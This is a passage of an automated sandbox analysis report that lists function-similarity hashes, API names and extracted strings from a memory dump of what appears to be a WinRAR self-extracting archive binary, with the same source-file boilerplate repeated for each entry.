                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                        • String ID: csm$f
                                                                                        • API String ID: 2395640692-629598281
                                                                                        • Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                        • Instruction ID: a41b8822e08f507a4669938ddfd59bb53c0e7b7429757a561cf6946e9f109d95
                                                                                        • Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                                                                                        • Instruction Fuzzy Hash: 4551F632E1960686EB54EF25EC44B29B397FF68B88F909134DA9E07748DF78E841C750
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                        • API String ID: 2102711378-639343689
                                                                                        • Opcode ID: cc2cdb65981a4fcc868e5d913d4f06653a23f25da57a99a038b17aaaeb8469e6
                                                                                        • Instruction ID: 3d2a1c57b2d4328ca3d8bcf80c292fca62b6c0aa6162ff9cf6f785189ad1da03
                                                                                        • Opcode Fuzzy Hash: cc2cdb65981a4fcc868e5d913d4f06653a23f25da57a99a038b17aaaeb8469e6
                                                                                        • Instruction Fuzzy Hash: 2251E262F0874285FB10FB60ED402BDA360AFAC7A4F802535DE5D136D6DF3CA485C220
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$Rect
                                                                                        • String ID: RarHtmlClassName
                                                                                        • API String ID: 2396740005-1658105358
                                                                                        • Opcode ID: 7f8a0b662af83a4f47b362c37f36e9414f73daccdb18f375bc1ce0a7ee57f15d
                                                                                        • Instruction ID: 4b89dce41f7b502db62a4a7f70d7414a9ac89bf04b453f2bad76990b79c75287
                                                                                        • Opcode Fuzzy Hash: 7f8a0b662af83a4f47b362c37f36e9414f73daccdb18f375bc1ce0a7ee57f15d
                                                                                        • Instruction Fuzzy Hash: 31518422609B4286EA24AF25E85437AF3A4FFCD784F846435DE8E47B55DF3CE4458710
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID: sfxcmd$sfxpar
                                                                                        • API String ID: 3540648995-3493335439
                                                                                        • Opcode ID: 42a5c16ff962b42e9c466757ddc2add4312beed441a9accfeec164922430c806
                                                                                        • Instruction ID: d25acc08f2c42f3cbc0f0c48c872ece829d4bc8a84306da669fe6ba5c08b2f1f
                                                                                        • Opcode Fuzzy Hash: 42a5c16ff962b42e9c466757ddc2add4312beed441a9accfeec164922430c806
                                                                                        • Instruction Fuzzy Hash: ED316F32B14A0684FB08AB65EC941ACA371FF9CB98F942135DE5D177A9DF38E081C364
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                        • API String ID: 0-56093855
                                                                                        • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                        • Instruction ID: c7cebe15d39d7df56d03e3fbf02b689c323bebf0005628b30fb6408247e23894
                                                                                        • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                        • Instruction Fuzzy Hash: 8021E321A09A4B90FA18EB19FC44178F3A4EF8DB88F982436DA4D47760DF7CE5948360
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 4061214504-1276376045
                                                                                        • Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                        • Instruction ID: 18b63580bfee2b66b18e061830b58f4e0909e1b16dff78777fe88d4a1f292515
                                                                                        • Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                        • Instruction Fuzzy Hash: 01F04F21A19A4281FF49AB11FC50379E3A4AF8C7A0F846039E98F46664DF3CE4C5C720
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                        • Instruction ID: 31e3b2aacd3ce66eb914905b289d54ee39239d5d54bc43c7c73c5a7b9d274367
                                                                                        • Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                        • Instruction Fuzzy Hash: FA81E422E1861245F710AB65DC506BCA6A8BF5DBA8FC46139CE1E13799EF3CE4C1C320
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 2398171386-0
                                                                                        • Opcode ID: 94d33130e0d3e07453908689b86af48371af1e3e167329ed22bda644dbf2c176
                                                                                        • Instruction ID: 20ebaf6d23eee7001cbbe70e86c866c88d78ae422fbd37f6eb313426791bcfee
                                                                                        • Opcode Fuzzy Hash: 94d33130e0d3e07453908689b86af48371af1e3e167329ed22bda644dbf2c176
                                                                                        • Instruction Fuzzy Hash: F551BE22B18A42A9FB54EB75EC403BDA3B1AF8D7A8F806635DE1D477D8DF3894458310
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 3659116390-0
                                                                                        • Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                        • Instruction ID: c98aca14b7be7ffb4bdf70d6222fa1e29aaa8d9e0a6593e749a3a1216797eaf3
                                                                                        • Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
                                                                                        • Instruction Fuzzy Hash: A051D032A14A5186F710DB25E8543ACBBB4FF487A8F449139CE5E57B98DF38D086C720
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$AllocString
                                                                                        • String ID:
                                                                                        • API String ID: 262959230-0
                                                                                        • Opcode ID: d07b7da074abff0e0d457bce77dac1cb0a8e060b1f374ff54e111f1298ea021c
                                                                                        • Instruction ID: 9beaf7400dc8bac29ec7f796856acc2e271344e03dcb559fa27f9d42d79cab43
                                                                                        • Opcode Fuzzy Hash: d07b7da074abff0e0d457bce77dac1cb0a8e060b1f374ff54e111f1298ea021c
                                                                                        • Instruction Fuzzy Hash: AC41FB31A0A64689F714AF21DC50378A294FF5CBA4FD46634E9AD877D5DF3CE1418320
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID:
                                                                                        • API String ID: 190572456-0
                                                                                        • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                        • Instruction ID: c8afe95e7e171b1e65221886486f95fbc161c3149f1bf62acd71a6ad013ccbd6
                                                                                        • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                        • Instruction Fuzzy Hash: 2441E522B09A4281FA19AF12EC00676E399BF6CFE0F896535DD9D4B744EF3CE4418320
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _set_statfp
                                                                                        • String ID:
                                                                                        • API String ID: 1156100317-0
                                                                                        • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                        • Instruction ID: e476b8585408c9fb415900c2cf386531269f2359608ec56cbde95913f9eec5c9
                                                                                        • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                        • Instruction Fuzzy Hash: 4A119176E1CA0781F6543128ED463799149BF5D3B0FC8623CEA7E0A6D6DF2EB4C04225
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                        • String ID:
                                                                                        • API String ID: 3621893840-0
                                                                                        • Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                        • Instruction ID: ff0a227d9d551002a3f1327792e4154a8c6146959070519cdbdbe060aa0bdbcc
                                                                                        • Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
                                                                                        • Instruction Fuzzy Hash: 9DF0FF21B2854683F754A720EC55A76B251FFECB05FC82434E54E41A949F3CD589CB21
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: __except_validate_context_recordabort
                                                                                        • String ID: csm$csm
                                                                                        • API String ID: 746414643-3733052814
                                                                                        • Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                        • Instruction ID: f51790b796a1b684789362e7dc4af85a2654242d68f703c6d560d3dc22276e2f
                                                                                        • Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                        • Instruction Fuzzy Hash: C271D172608A818ADB60AF61D85037DFBA0FF18B88F94A135DB8C0BA85CB3CD591C750
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: $*
                                                                                        • API String ID: 3215553584-3982473090
                                                                                        • Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                        • Instruction ID: 979772e07fc653608de5975086651f260f0fbe532aaaa655128bae295e709a02
                                                                                        • Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                        • Instruction Fuzzy Hash: 58516672D0D6468AF76CAE28C8453BC77A9FF29B18F943135C6CA45299CF3CD481C626
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$StringType
                                                                                        • String ID: $%s
                                                                                        • API String ID: 3586891840-3791308623
                                                                                        • Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                        • Instruction ID: 0d356266a155a8db477c62f72139afd9ec2b14174ba82ad376865bdbd703945a
                                                                                        • Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                        • Instruction Fuzzy Hash: 3F417422B19B8149EB61AF25DC003A9A2A5FF58BB8FC85275DE5D077C5DF3CE4858310
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                        • String ID: csm
                                                                                        • API String ID: 2466640111-1018135373
                                                                                        • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                        • Instruction ID: 2797b92d0c1f9ee230a38d698afd7697172fed44b9c7d05685662b5fe57716bb
                                                                                        • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                        • Instruction Fuzzy Hash: DD517E7261974187D620AB56E8413AEB7A4FB9CB90F842535EBCD07B56DF3CE450CB10
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
